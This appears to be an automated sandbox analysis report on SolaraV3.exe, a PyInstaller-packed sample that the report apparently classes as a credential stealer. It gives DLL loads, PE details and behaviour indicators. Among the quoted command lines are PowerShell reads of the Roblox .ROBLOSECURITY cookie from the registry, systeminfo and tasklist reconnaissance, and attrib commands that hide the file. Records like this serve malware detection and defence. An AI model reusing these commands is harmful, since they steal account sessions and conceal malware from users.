Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST

Source: C:\Users\user\Desktop\SolaraV3.exe

File opened: C:\Users\user\Desktop\pyvenv.cfg

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: SolaraV3.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: SolaraV3.exe

Static file information: File size 6315120 > 1048576

Source: SolaraV3.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SolaraV3.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SolaraV3.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SolaraV3.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SolaraV3.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SolaraV3.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: SolaraV3.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: SolaraV3.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: SolaraV3.exe, 00000002.00000002.2054170176.00007FFB1E4C1000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: SolaraV3.exe, 00000002.00000002.2046985205.00007FFB0B7FC000.00000040.00000001.01000000.00000013.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1t 7 Feb 2023built on: Thu Feb 9 15:27:40 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: SolaraV3.exe, 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: SolaraV3.exe, 00000001.00000003.1559590237.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2053703446.00007FFB1C3C1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.1.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2051655996.00007FFB0C5F1000.00000040.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2051929047.00007FFB18B71000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: SolaraV3.exe
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbMM source: SolaraV3.exe, 00000002.00000002.2051343700.00007FFB0C5DB000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\libssl-1_1.pdb@@ source: SolaraV3.exe, 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python310.pdb source: SolaraV3.exe, 00000002.00000002.2049056875.00007FFB0BECF000.00000040.00000001.01000000.00000004.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2053917460.00007FFB1E471000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: SolaraV3.exe, 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: ;C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.pdb source: powershell.exe, 0000004A.00000002.1847941368.00000239E7D72000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ;C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.pdbhP@ source: powershell.exe, 0000004A.00000002.1847941368.00000239E7D72000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: SolaraV3.exe, 00000002.00000002.2051343700.00007FFB0C5DB000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2053371221.00007FFB1C251000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: SolaraV3.exe, 00000002.00000002.2052555001.00007FFB1AB01000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: SolaraV3.exe, 00000002.00000002.2052925726.00007FFB1BB11000.00000040.00000001.01000000.0000000A.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-1_1.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 0000006E.00000000.1923151482.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmp, rar.exe, 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmp, rar.exe.1.dr
Source:	Binary string: D:\a\1\b\libssl-1_1.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2050619713.00007FFB0C411000.00000040.00000001.01000000.0000000E.sdmp

Source: SolaraV3.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SolaraV3.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SolaraV3.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SolaraV3.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SolaraV3.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

Compiles C# or VB.Net code

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline"

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\SolaraV3.exe

Code function: 2_2_00007FFB0BB66EE0 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

2_2_00007FFB0BB66EE0

PE file contains an invalid checksum

Source: python310.dll.1.dr	Static PE information: real checksum: 0x0 should be: 0x179482
Source: unicodedata.pyd.1.dr	Static PE information: real checksum: 0x0 should be: 0x4d519
Source: libffi-7.dll.1.dr	Static PE information: real checksum: 0x0 should be: 0x9bb1
Source: _ctypes.pyd.1.dr	Static PE information: real checksum: 0x0 should be: 0x15162
Source: _bz2.pyd.1.dr	Static PE information: real checksum: 0x0 should be: 0x190ae
Source: sqlite3.dll.1.dr	Static PE information: real checksum: 0x0 should be: 0xa7f83
Source: libcrypto-1_1.dll.1.dr	Static PE information: real checksum: 0x0 should be: 0x118790
Source: libssl-1_1.dll.1.dr	Static PE information: real checksum: 0x0 should be: 0x3bfea
Source: SolaraV3.exe	Static PE information: real checksum: 0x60f6c0 should be: 0x6069ca
Source: _queue.pyd.1.dr	Static PE information: real checksum: 0x0 should be: 0xd20c
Source: _socket.pyd.1.dr	Static PE information: real checksum: 0x0 should be: 0x16097
Source: _ssl.pyd.1.dr	Static PE information: real checksum: 0x0 should be: 0x15afd
Source: _hashlib.pyd.1.dr	Static PE information: real checksum: 0x0 should be: 0x14a50
Source: se3yji4z.dll.93.dr	Static PE information: real checksum: 0x0 should be: 0xce6c
Source: _decimal.pyd.1.dr	Static PE information: real checksum: 0x0 should be: 0x241ea
Source: select.pyd.1.dr	Static PE information: real checksum: 0x0 should be: 0x927e
Source: _lzma.pyd.1.dr	Static PE information: real checksum: 0x0 should be: 0x2099b
Source: _sqlite3.pyd.1.dr	Static PE information: real checksum: 0x0 should be: 0x1931c

PE file contains sections with non-standard names

Source: libffi-7.dll.1.dr	Static PE information: section name: UPX2
Source: VCRUNTIME140.dll.1.dr	Static PE information: section name: _RDATA

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 14_2_00007FFAA935D2A5 pushad ; iretd

14_2_00007FFAA935D2A6

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Found pyInstaller with non standard icon

Source: C:\Users\user\Desktop\SolaraV3.exe

Process created: "C:\Users\user\Desktop\SolaraV3.exe"

Uses attrib.exe to hide files

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe"

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
